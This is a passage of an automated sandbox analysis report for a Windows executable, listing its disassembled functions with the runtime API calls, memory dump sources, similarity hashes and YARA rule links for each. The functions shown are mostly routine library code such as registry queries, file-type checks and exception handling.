                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                                                                                                      • Instruction ID: 898793086584a8fd962b49f0ded41d37ae6e9ed1a61a4fa6f2f43884c1de653b
                                                                                                                                                      • Opcode Fuzzy Hash: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                                                                                                      • Instruction Fuzzy Hash: 9FE0E6F1D50108DECB05EFE1D9468FFB3B89E44704B60055BF501B2141DA396F448B7A
                                                                                                                                                      Function 00401179 Relevance: 6.2, APIs: 4, Instructions: 169registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?), ref: 00401234
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00401260
                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00401270
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040128A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$Open__alloca_probe_16
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2359313486-0
                                                                                                                                                      • Opcode ID: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                                                                                                      • Instruction ID: 155446f771d410e671b768db9f992633fbdae1977b8ecb0b0f979a5b3f81bbb5
                                                                                                                                                      • Opcode Fuzzy Hash: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                                                                                                      • Instruction Fuzzy Hash: 1B414C71A002159FDB04CF98CC82FAEB7B8FF49324F144659E515EB390D734AA01CBA4
                                                                                                                                                      Function 00414E17 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNEL32(?,0042D3F8,0000000C,00411411,00000000), ref: 00414E4B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00414E55
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00414E5C
                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 00414EA7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastType__dosmaperr__set_osfhnd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2557730991-0
                                                                                                                                                      • Opcode ID: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                                                                                                      • Instruction ID: 3cc309415f377f4129a0eb94033780c96aa18bf88aced23695ad88617a0cb697
                                                                                                                                                      • Opcode Fuzzy Hash: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                                                                                                      • Instruction Fuzzy Hash: 8321D3315453149BDB119F65D8017D97B60BFC1328F68864AE4648B2D2C77D85C2DF8D
                                                                                                                                                      Function 0041C3BA Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,004157E3), ref: 0041C3BD
                                                                                                                                                      • __malloc_crt.LIBCMT ref: 0041C3EC
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C3F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 237123855-0
                                                                                                                                                      • Opcode ID: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                                                                                                      • Instruction ID: 254ac7f8c54955929a6bc1e0f5671cac67dec88514963bcebe1c0ef7fa51bea3
                                                                                                                                                      • Opcode Fuzzy Hash: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                                                                                                      • Instruction Fuzzy Hash: C2F027376841245A8B307734BCC98EB2369DAD536530B846BFD11C3300FA288EC683AD
                                                                                                                                                      Function 00413095 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130A2
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130BE
                                                                                                                                                      • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,00401093,00000000), ref: 004130DD
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130E4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 799838862-0
                                                                                                                                                      • Opcode ID: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                                                                                                      • Instruction ID: 51a6bbdecdf6f47f4ebbfeeb6a8912ade43f3678a6090e18808c6fdb105ee1f2
                                                                                                                                                      • Opcode Fuzzy Hash: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                                                                                                      • Instruction Fuzzy Hash: 4FF06236304200A7D6304F55AC44FAABFE8FB89712F50456AFA02E7640C665B9478B59
                                                                                                                                                      Function 0040DC20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040DC34
                                                                                                                                                        • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133C1
                                                                                                                                                        • Part of subcall function 004133AC: __CxxThrowException@8.LIBCMT ref: 004133D6
                                                                                                                                                        • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133E7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                      • String ID: invalid map/set<T> iterator$xsB
                                                                                                                                                      • API String ID: 1823113695-3138870737
                                                                                                                                                      • Opcode ID: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                                                                                                      • Instruction ID: a79d5b77c9b1e1c4e0fc09c71210dda7b324129ff3d958bd811fbac4ed82f6f9
                                                                                                                                                      • Opcode Fuzzy Hash: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                                                                                                      • Instruction Fuzzy Hash: 66B1D470A05280DFD715CF68D190A26BFA1AF55304F2880EED4895F392C735ED8ACBE6
                                                                                                                                                      Function 00410160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004102F6
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041030B
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2370478142-962849395
                                                                                                                                                      • Opcode ID: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                                                                                                      • Instruction ID: 651e35afa5efbdb74e46a8e88ce115f4b797959aa4cbf5ed1c5213b777d4a3a3
                                                                                                                                                      • Opcode Fuzzy Hash: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                                                                                                      • Instruction Fuzzy Hash: BA519371A00209AFDB04DFA8C841BEEB7B5FF58314F14416AE805E7392D779AE85CB54
                                                                                                                                                      Function 0040F240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0040F311
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040F326
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                                                                                                      • Instruction ID: 4f6dfa4c55e2a7fe9fe8bf20358b23f4b48a3eb26038b4de4cdee703bad351b0
                                                                                                                                                      • Opcode Fuzzy Hash: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                                                                                                      • Instruction Fuzzy Hash: D451ADB1A00244DFC710DF9CDD41B8AB7B5FB49324F14827AE8159B7A1D7B8A904CB58
                                                                                                                                                      Function 0040F400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000003FF,00000000,00000000,?), ref: 0040F45A
                                                                                                                                                      • _wcsrchr.LIBCMT ref: 0040F482
                                                                                                                                                      Strings
                                                                                                                                                      • LocalizeStringManager using %s as current directory, xrefs: 0040F537
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
